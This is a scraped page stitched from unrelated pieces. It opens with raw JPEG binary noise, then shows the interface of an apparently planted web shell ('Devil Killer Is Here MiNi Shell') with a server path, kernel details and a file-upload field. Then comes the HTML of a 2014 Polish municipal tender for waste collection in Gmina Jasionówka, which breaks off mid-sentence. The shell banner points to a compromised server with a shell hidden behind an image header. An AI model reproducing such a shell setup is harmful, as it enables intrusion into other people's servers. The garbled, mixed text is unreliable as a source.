JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140415/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140415/82057-N-2014.html

<p class="kh_header"><b>Jasionówka: KOMPLEKSOWE ODBIERANIE I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH NA TERENIE GMINY JASIONÓWKA</b><br>
<b>Numer ogłoszenia: 82057 - 2014; data zamieszczenia: 15.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jasionówka , Rynek 19, 19-122 Jasionówka, woj. podlaskie, tel. 85 7278030, faks 85 7278031.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jasionowka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KOMPLEKSOWE ODBIERANIE I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH NA TERENIE GMINY JASIONÓWKA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa w zakresie odbioru i zagospodarowania wszystkich odpadów komunalnych wytwarzanych w nieruchomościach zamieszkałych na terenie Gminy Jasionówka.
Obszar Gminy wraz z siecią dróg publicznych przedstawia załącznik nr 1 a. do SIWZ.

Dane dotyczące Gminy, istotne z punktu widzenia zamówienia: obszar Gminy wynosi 97 km2, 
w skład Gminy wchodzi 18 sołectw: Brzozówka Folwarczna, Czarnystok, Dobrzyniówka, Górnystok, Jasionóweczka, Jasionówka, Kalinówka Królewska, Kamionka, Kąty, Koziniec, Krasne Folwarczne, Krasne Małe, Krasne Stare, Krzywa, Kujbiedy, Łękobudy, Milewskie, Słomianka. 
W Gminie Jasionówka zameldowanych jest 2966 osób, z tego ok. 99 osób na terenie zabudowy wielorodzinnej (w Jasionówce - w 6 budynkach). W zabudowie wielorodzinnej odpady będą gromadzone zbiorczo w 3 budynkach ( Urzędu Gminy, Zespół Szkolno-Przedszkolny w Jasionówce - budynek szkoły i przedszkola). Właściciele (użytkownicy) pozostałych nieruchomości (lokali) będą gromadzić odpady komunalne osobno. Łączna liczba nieruchomości zamieszkałych (domów mieszkalnych i mieszkań w budynkach wielorodzinnych) na terenie gminy wynosi ok. 670.

Poniższa tabela przedstawia szacunkową liczbę nieruchomości zamieszkałych (domów mieszkalnych) w poszczególnych miejscowościach, wraz z liczbą osób zameldowanych. (dane z ewidencji ludności Gminy Jasionówka, stan na dzień 01.04.2014 r.).
Lp.
Miejscowość
Liczba mieszkańców
Nieruchomości zamieszkałe
1
Brzozówka Folwarczna
64
13
2
Czarnystok
162
33
3
Dobrzyniówka
31
9
4
Górnystok
46
11
5
Jasionóweczka
214
46
6
Jasionówka
786
177
7
Kalinówka Królewska
257
65
8
Kamionka
272
58
9
Kąty
91
22
10
Koziniec
83
12
11
Krasne Folwarczne
91
20
12
Krasne Małe
54
13
13
Krasne Stare
104
27
14
Krzywa
94
19
15
Kujbiedy
52
11
16
Łękobudy
15
5
17
Milewskie
287
56
18
Słomianka
263
70
Razem
2966
670

W poszczególnych miejscowościach występuje także zabudowa kolonijna. Dane dotyczące liczby osób zameldowanych nie odpowiadają w pełni liczbie osób faktycznie zamieszkałych na terenie gminy. Należy traktować je jako przybliżone, ponadto mogą one ulec zmianie na skutek ruchu ludności. Liczba nieruchomości zamieszkałych może w niewielkim stopniu ulec zmianie w wyniku oddania do użytku i zamieszkania nowych budynków lub wyludnienia.

Uwaga: 
Do 10 czerwca 2014 roku Zamawiający dostarczy Wykonawcy dokładny wykaz gospodarstw domowych wraz z liczbą zamieszkałych osób oraz informację, czy dane gospodarstwo domowe zadeklarowało selektywną zbiórkę odpadów komunalnych. Wykaz ten w trakcie realizacji umowy będzie sukcesywnie aktualizowany.

Poniższa tabela przedstawia ilość odpadów odebranych z terenu gminy na podstawie sprawozdań składanych przez przedsiębiorców posiadających zezwolenie na odbieranie odpadów komunalnych oraz kart przekazania odpadów w latach 2011, 2012 i 2013.
Rodzaj odpadów
Ilość odpadów (w tonach)
2011 r.
2012 r.
2013 r.
Zmieszane odpady komunalne
241,60
221,00
172,39
Papier
1,7
1,3
7,80
Szkło
5,60
5,30
44,03
Tworzywa sztuczne
10,50
22,90
5,31
Zużyty sprzęt elektryczny i elektroniczny
-
3,20
1,50
Baterie
-
-
-
Razem
200,28
262.60
231.03

Liczba gospodarstw domowych, od  których  zostały  odebrane  zmieszane  odpady  komunalne  wynosiła:  w 2011 r. -  476, w 2012 r. - 496, w 2013 r. - 670. Papier, szkło i tworzywa  sztuczne zbierane były selektywnie do pojemników ( 1100 l ) ustawionych w miejscach publicznych do końca III kwartału 2013 r.

Uwaga:
Podane wyżej ilości odpadów należy traktować jako dane orientacyjne,  mogą wystąpić inne (mniejsze lub większe) ilości odpadów. Wykonawcy nie przysługuje prawo dodatkowego wynagrodzenia, czy też odszkodowania za odebranie innych ilości odpadów.

Zakres rzeczowy przedmiotu zamówienia:
1. Wykonawca zobowiązany jest do odbioru i zagospodarowania odpadów komunalnych wytwarzanych w gospodarstwach domowych na nieruchomościach zamieszkałych położonych na terenie Gminy Jasionówka zgodnie z ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach ( tj. Dz. U. z 2013 r. poz. 1399 z późn. zm.), zapisami Planu gospodarki odpadami województwa podlaskiego na lata 2012-2017 (uchwała Nr XX/233/12 Sejmiku Województwa Podlaskiego z dnia 21 czerwca 2012 r.) oraz zapisami Regulaminu utrzymania czystości i porządku na terenie Gminy Jasionówka (Uchwała Nr XVIII/142/13 Rady Gminy Jasionówka z dnia 21 stycznia 2013 r. - http://ug-jasionowka.pbip.pl/index.php?event=informacja&id=4457).
2. Odpady zmieszane i odpady pozostałe z segregacji, gromadzone w pojemnikach dostarczonych przez Wykonawcę, na jego koszt należy odbierać zgodnie z harmonogramem ustalonym przez Wykonawcę (po zatwierdzeniu przez Zamawiającego), z częstotliwością określoną w uchwale Nr XVI/118/12 Rady Gminy Jasionówka z dnia 7 grudnia 2012 r. w sprawie ustalenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów (http://ug-jasionowka.pbip.pl/index.php?event=informacja&id=4345). 
3. Worki do gromadzenia odpadów selektywnie zebranych mieszkańcom Gminy dostarcza Wykonawca a  ich koszt wlicza do wartości zamówienia. Wykonawca jest zobowiązany do wysegregowania poszczególnych frakcji odpadów, wymienionych w tym punkcie 
a gromadzonych łącznie przez właścicieli nieruchomości.
4. Do 10 czerwca Zamawiający dostarczy Wykonawcy wykaz nieruchomości, z których będą odbierane odpady ulegające biodegradacji.  Wykaz  ten  w  trakcie  realizacji  umowy  będzie  sukcesywnie  aktualizowany.  Worki  na odpady  komunalne  ulegające  biodegradacji  mogą  być  dowolnego  koloru,  nie  mogą  to  być  worki przekazane przez Wykonawcę do zbierania odpadów selektywnie zebranych.
5. Pierwszy  harmonogram  odbioru  odpadów  komunalnych,  o  którym  mowa  powyżej sporządza Wykonawca i przedstawia do zatwierdzenia Zamawiającemu w terminie 7 dni od podpisania umowy.  Harmonogram  ten  do  właścicieli  nieruchomości  dostarcza  Zamawiający.  Wszelkie  zmiany harmonogramu  wymagają  akceptacji  Zamawiającego.  Zmieniony harmonogram do nieruchomości objętych niniejszym systemem odbioru odpadów komunalnych dostarcza Wykonawca.
6. Wszystkie frakcje odpadów komunalnych (jeżeli wystąpią) należy także odbierać z Punktu Selektywnego Zbierania Odpadów Komunalnych zlokalizowanego na działce geod. Nr 876 (zaznaczono na mapie - nieruchomość ogrodzona, położona przy drodze z Jasionówki do Milewskich) w dniach otwarcia punktu, zgodnie z uzgodnionym harmonogramem, w którym zostaną ustalone dni i godziny otwarcia PSZOK oraz terminy odbioru od mieszkańców poszczególnych frakcji odpadów. Odpady należy odebrać w dniu ich dostarczenia przez mieszkańców do punktu (w godzinach jego otwarcia). Żadne odpady nie mogą pozostać 
w punkcie po jego zamknięciu. Dni i godziny otwarcia punktu zostaną uzgodnione pomiędzy Wykonawcą i Zamawiającym, przy czym punkt będzie otwarty co najmniej jeden dzień 
w tygodniu przez min. 6 godzin. Za wyposażenie i prowadzenie PSZOK odpowiada Wykonawca.
7. Wykonawca zobowiązany jest do zapewnienia i wyposażania nieruchomości, z których odbierane są odpady komunalne gromadzone w sposób selektywny w kolorowe worki o pojemności 120 litrów z folii LDPE  o  grubości  zapewniającej  odpowiednią  wytrzymałość  worków  (tj.  co  najmniej  60  mikronów) przeznaczone  na  gromadzenie  odpadów  segregowanych - kolorystyka określona w Regulaminie utrzymania czystości i porządku na terenie Gminy Jasionówka.  Po  każdorazowym  odbiorze  tych  odpadów należy  pozostawić  nowe  worki  w  ilości  odpowiadającej  workom  odebranym.  Worki  powinny  być oznaczone  informacją  o  rodzaju  gromadzonych  w  nich  odpadów,  nazwą  oraz  numerem  telefonu Wykonawcy. Worki należy przekazywać właścicielowi nieruchomości.
8. Obowiązkiem Wykonawcy będzie posprzątanie miejsca wokół opróżnianych pojemników, gdy zajdzie taka  potrzeba,  między  innymi  poprzez  zabranie  dostawionych  przy  pojemnikach  worków  z niesegregowanymi (zmieszanymi) odpadami komunalnymi.
9. Odbiór odpadów  komunalnych  od  właścicieli  nieruchomości  Wykonawca  powinien  realizować  w godzinach 7.00-20.00.
10. Wykonawca jest zobowiązany do porządkowania terenu zanieczyszczonego odpadami komunalnymi i innymi  zanieczyszczeniami  wysypanymi  z  pojemników,  kontenerów,  worków,  pojazdów  w  trakcie realizacji usługi wywozu.
11. Wykonawca jest obowiązany do realizacji reklamacji (nieodebranie z nieruchomości odpadów zgodnie z harmonogramem, niedostarczenie worków na odpady segregowane itp.) w przeciągu 36 godzin od otrzymania  zawiadomienia  faksem  lub  e-mailem  od  Zamawiającego.  Wykonanie  reklamacji  należy niezwłocznie potwierdzić faksem lub e-mailem na adres Zamawiającego.
12. System  odbierania  odpadów  komunalnych  nie  obejmuje  odpadów  powstających  w  wyniku prowadzenia działalności gospodarczej.
13. Wykonawca jest zobowiązany do ważenia wszystkich odebranych odpadów komunalnych na legalizowanej wadze i przekazywania dokumentacji pomiarów Zamawiającemu w okresach miesięcznych. Wykonawca jest zobowiązany do bieżącego prowadzenia ilościowej i jakościowej ewidencji odpadów zgodnie z przepisami ustawy o odpadach oraz ustawy o utrzymaniu czystości i porządku w gminach i przekazywania kopii dokumentacji Zamawiającemu.
14. Wykonawca zobowiązany jest do prowadzenia i przekazywania co miesiąc Zamawiającemu ewidencji nieruchomości, z których zostały odebrane zmieszane i selektywnie zebrane odpady, w zakresie ilości zebranych odpadów (ilość i pojemność pojemników z odpadami zmieszanych oraz ilość poszczególnych worków z odpadami zebranymi selektywnie).
15. Wykonawca zobowiązany jest kontrolować realizowane przez właściciela nieruchomości obowiązki w zakresie  selektywnego  zbierania  odpadów  komunalnych,  a  w  przypadku  ich  niedopełnienia Wykonawca  zobowiązany  jest  przyjąć  odpady  jako  zmieszane  odpady  komunalne  i  niezwłocznie pisemnie powiadomić o tym Zamawiającego, nie później niż w ciągu 3 dni. Do powyższej informacji Wykonawca zobowiązany będzie załączyć dokumentację filmową lub fotograficzną umożliwiającą identyfikację nieruchomości z rejestracją daty i godziny. Wykaz nieruchomości prowadzących selektywne zbieranie odpadów komunalnych Zamawiający przekaże Wykonawcy do 10 czerwca 2014 roku.  Wykaz  ten będzie sukcesywnie aktualizowany w trakcie realizacji umowy.
16. Wykonawca zobowiązany jest do przekazywania odebranych zmieszanych odpadów komunalnych, pozostałości z sortowania odpadów komunalnych oraz odpadów zielonych do regionalnej instalacji przetwarzania odpadów komunalnych wskazanej w Planie gospodarki odpadami dla województwa podlaskiego na lata 2012-2017 - w regionie gospodarki odpadami odpowiadającym położeniu Gminy oraz do przekazywania selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21 ze zm.). 
17. Wykonawca  zobowiązany  jest  posiadać  bazę  magazynowo  -  transportową  usytuowaną  na terenie Gminy Jasionówka, lub w odległości nie większej niż 60 km od granicy Gminy, na terenie, do którego posiada tytuł prawny. Baza magazynowo - transportowa musi spełniać następujące warunki: 
a)  teren  bazy  magazynowo  -  transportowej  musi  być  zabezpieczony  w  sposób  uniemożliwiający wstęp osobom nieupoważnionym, 
b)  miejsce  przeznaczone  do  parkowania  pojazdów  musi  być  zabezpieczone  przed  emisją zanieczyszczeń do gruntu, 
c)  miejsce magazynowania selektywnie zbieranych odpadów komunalnych musi być zabezpieczone przed  emisją  zanieczyszczeń  do  gruntu  oraz  zabezpieczone  przed  działaniem  czynników atmosferycznych, 
d)  teren  bazy  musi  być  wyposażony  w  urządzenia  lub  systemy  zapewniające  zagospodarowanie wód  opadowych  i  ścieków  przemysłowych,  pochodzących  z  terenu  bazy  zgodnie  z  wymogami określonymi przepisami ustawy z dnia 18 lipca 2001 r. - Prawo wodne (Dz. U. z 2012 r. poz. 145 ze zm.), 
e)  baza magazynowo -  transportowa musi być wyposażona w miejsca przeznaczone do parkowania pojazdów,  pomieszczenie  socjalne  dla  pracowników  odpowiadające  ilości  zatrudnionych  osób, miejsce  do  magazynowania  selektywnie  zebranych  odpadów  z  grupy  odpadów  komunalnych oraz legalizowaną samochodową wagę najazdową -  w przypadku, gdy na terenie bazy następuje magazynowanie odpadów. 
f) na  terenie  bazy  magazynowo  -  transportowej  powinien  znajdować  się  także  punkt  bieżącej konserwacji i napraw pojazdów oraz miejsce do mycia i dezynfekcji pojazdów, o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo-transportowej.  
Część  transportowa  oraz  część  magazynowa  bazy  mogą  znajdować  się  na oddzielnych terenach, przy jednoczesnym spełnieniu powyższych warunków.
18. Wykonawca zobowiązany jest:
a)  posiadać  co  najmniej  dwa  pojazdy  przystosowane  do  odbierania  zmieszanych  odpadów komunalnych oraz co najmniej dwa pojazdy przystosowane do odbierania selektywnie zebranych odpadów  komunalnych,  a  także  co  najmniej  jeden  pojazd  do  odbierania  odpadów  bez  funkcji kompaktującej,
b)  trwale i czytelnie oznakować pojazdy w widocznym miejscu nazwą firmy oraz danymi adresowymi i numerem telefonu podmiotu odbierającego odpady komunalne,
c)  posiadać na terenie bazy magazynowo - transportowej urządzenia do selektywnego gromadzenia odpadów  komunalnych  przed  ich  transportem  do  miejsc  przetwarzania  -  urządzenia  należy utrzymywać we właściwym stanie technicznym i sanitarnym,
d) aby pojazdy  były  zarejestrowane  i  dopuszczone  do  ruchu  oraz  posiadały  aktualne  badania techniczne i świadectwa dopuszczenia do ruchu zgodnie z przepisami o ruchu drogowym,
e) aby konstrukcja pojazdów zabezpieczała przed niekontrolowanym wydostaniem się na zewnątrz odpadów, podczas ich magazynowania, przeładunku, a także transportu,
f)  poddawać pojazdy i urządzenia myciu i dezynfekcji z częstotliwością gwarantującą  zapewnienie im właściwego stanu sanitarnego, nie rzadziej niż raz na miesiąc, a w okresie letnim nie rzadziej niż  raz  na  2  tygodnie  -  Wykonawca  winien  posiadać  aktualne  dokumenty  potwierdzające wykonanie czynności,
g) na koniec  każdego  dnia  roboczego  opróżniać  pojazdy  z  odpadów  i  parkować  wyłącznie  na terenie bazy magazynowo-transportowej,
h) aby konstrukcja  pojazdów  zabezpieczała  przed  rozwiewaniem  i  rozpylaniem  przewożonych odpadów oraz minimalizowała oddziaływanie czynników atmosferycznych na odpady,
i) wyposażyć pojazdy w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników,
j) dopuszcza się wyposażenie pojazdów w urządzenie do ważenia odpadów komunalnych;
k) pojazdy muszą być wyposażone w system:
- monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów, 
- czujników zapisujących dane o miejscach wyładunku odpadów,
umożliwiający weryfikację tych danych. 
19. Zakazuje  się Wykonawcy mieszania  selektywnie  zebranych  odpadów  komunalnych  ze  zmieszanymi odpadami komunalnymi.
20. Wykonawca, w okresie obowiązywania umowy, zobowiązany jest do podjęcia wszelkich niezbędnych działań zmierzających do osiągnięcia:
a) poziomu recyklingu i przygotowania do ponownego użycia następujących frakcji odpadów komunalnych:  papieru,  metali,  tworzyw  sztucznych  i  szkła,
b) poziomu  recyklingu,  przygotowania  do  ponownego  użycia  i  odzysku  innymi  metodami:  innych  niż niebezpieczne  odpadów  budowlanych  i  rozbiórkowych,
w  wysokości  określonej  w  przepisach rozporządzenia  Ministra  Środowiska  z  dnia  29  maja  2012  r.  w  sprawie  poziomów  recyklingu, przygotowania  do  ponownego  użycia  i  odzysku  innymi  metodami  niektórych  frakcji  odpadów komunalnych (Dz. U. z 2012 r. poz. 645). 
21. Wykonawca  w  okresie  obowiązywania  umowy  zobowiązany  jest  do  podjęcia  wszelkich  niezbędnych działań  zmierzających  do  ograniczenia  masy  odpadów  komunalnych  ulegających  biodegradacji przekazywanych  do  składowania  do  wysokości  określonej  w  przepisach  rozporządzenia  Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów  ograniczenia masy odpadów komunalnych ulegających  biodegradacji  przekazywanych  do  składowania  oraz  sposobu  obliczania  poziomu ograniczania masy tych odpadów (Dz. U. z 2012 r. poz. 676), 
22. Wykonawca, zgodnie z art. 9 lit. n ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w  gminach, zobowiązany jest do sporządzania kwartalnych sprawozdań i przekazywania ich Wójtowi Gminy w terminie do końca miesiąca następującego po kwartale, którego dotyczy wraz z dokumentami sporządzanymi na potrzeby ewidencji odpadów oraz dokumentów potwierdzających osiągnięcie określonych poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania,
23. Wykonawca  zobowiązany  jest  do  świadczenia  usług  dodatkowych  płatnych  przez  właścicieli nieruchomości, tj. udostępnienia pojemnika (kontener, worek typu big-bag) przeznaczonego na odpady budowlane  i  rozbiórkowe  z  remontów  prowadzonych  samodzielnie  na  podstawie  pozwolenia  na budowę lub zgłoszenia oraz odbioru i zagospodarowania tych odpadów.
24. Wykonawca zobowiązany jest do nieodpłatnego udostępnienia właścicielom nieruchomości pojemników na odpady komunalne zmieszane i worków na odpady komunalne ulegające biodegradacji i dostarczenia ich na wniosek właściciela nieruchomości.
25. W przypadku stwierdzenia, że usługi wykonywane są niezgodnie z obowiązującymi przepisami, ofertą lub umową, Zamawiający może odmówić zapłaty i żądać ich ponownego wykonania lub odstąpić od umowy z winy Wykonawcy z naliczeniem kary umownej.
26. Obowiązkiem  Wykonawcy  będzie  odbieranie  odpadów  komunalnych  od  wszystkich  właścicieli nieruchomości  zamieszkałych  położonych  na  terenie  gminy.  Usługa  obejmuje  zapewnienie przez Wykonawcę dojazdu do punktów trudnodostępnych (szczególnie zimą i w okresie wzmożonych opadów  deszczu  i  śniegu)  poprzez  zorganizowanie  środków  transportu,  które  umożliwią  odbiór odpadów z punktów adresowych o problematycznej lokalizacji.
27. Wykonawca zobowiązany jest do realizacji przedmiotu umowy przy zachowaniu należytej staranności zgodnie z obowiązującymi przepisami prawa, w szczególności: 
- ustawą z dnia 13 września 1996 roku o  utrzymaniu  czystości  i  porządku  w  gminach  (Dz.U.  z  2013 r.  poz.  1399  ze  zm.)  wraz  z  przepisami wykonawczymi  
- ustawą  z  dnia  14  grudnia  2012  r.  o  odpadach  (Dz.U.  z  2013r.  poz.  21)  wraz  z przepisami  wykonawczymi  
-  ustawą  z  dnia  27  kwietnia  2001  r.  Prawo  ochrony  środowiska  (Dz.U.  z 2013 r.  poz. 1232 z późn.zm.) wraz z przepisami wykonawczymi 
-  ustawą z dnia 29 lipca 2005 r. o zużytym sprzęcie elektrycznym i elektronicznym (Dz.U. z 2013 r. poz. 1158 z późn.zm.) 
-  ustawą z dnia 24 kwietnia 2009 r. o bateriach i akumulatorach (Dz.U. z 2009 r. Nr 79, poz. 666 z późn.zm.) 
- rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości 
(Dz. U. z 2013 r. poz. 122),
- Planem gospodarki odpadami województwa podlaskiego na lata 2012 - 2017 (uchwała Nr XX/233/12 z dnia 21 czerwca 2012 r.),
- uchwałą w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Jasionówka (http://ug-jasionowka.pbip.pl/index.php?event=informacja&id=4457),
- uchwałą w ustalenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów (http://ug-jasionowka.pbip.pl/index.php?event=informacja&id=4345).

Uwaga!
Wymienione w dokumentacji znaki towarowe materiałów i urządzeń nie są wskazaniem wyrobu - służą tylko określeniu wymaganego standardu materiałów i urządzeń i mogą zostać zastąpione przez urządzenia równoważne (równorzędne). Produktem równoważnym będzie produkt co najmniej równy pod względem cech technicznych i jakościowych produktowi o danym znaku towarowym, patencie lub pochodzeniu..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.10.00-2, 90.51.11.00-3, 90.51.12.00-4, 90.51.20.00-9, 90.51.31.00-7, 90.51.32.00-8, 90.51.40.00-3, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości: 1.1. 5.000,00 PLN słownie: pięć tysięcy złotych 2. Wadium może być wniesione w jednej lub kilku następujących formach: 1) Pieniądzu, 2) Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3) Gwarancjach bankowych, 4) Gwarancjach ubezpieczeniowych, 5) Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r., Nr 42, poz. 275, z późn. zm.) 3. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego:  PBS w Knyszynie Oddział w Jasionówce Nr 08 8076 0001 0000 1339 2000 0010 z adnotacją: Wadium. Przetarg nieograniczony. Odpady komunalne Gminy Jasionówka. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli przed upływem terminu składania ofert znajdzie się na rachunku bankowym Zamawiającego. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew na rachunek bankowy wskazany przez Wykonawcę. 4. W przypadku wnoszenia wadium w formie poręczenia lub gwarancji, oryginał poręczenia lub gwarancji należy złożyć 